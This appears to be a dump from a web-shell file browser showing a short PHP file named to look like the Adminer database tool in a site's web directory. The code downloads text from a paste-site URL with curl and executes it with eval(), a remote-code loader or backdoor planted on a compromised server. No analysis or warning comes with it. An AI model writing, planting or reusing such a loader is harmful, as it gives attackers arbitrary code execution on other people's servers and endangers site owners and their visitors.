| Direktori : /home/boradancar/www/ |
| Current File : /home/boradancar/www/adminer-.php |
<?php
function get($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
eval('?>' . get('https://0paste.com/393358.txt'));
?>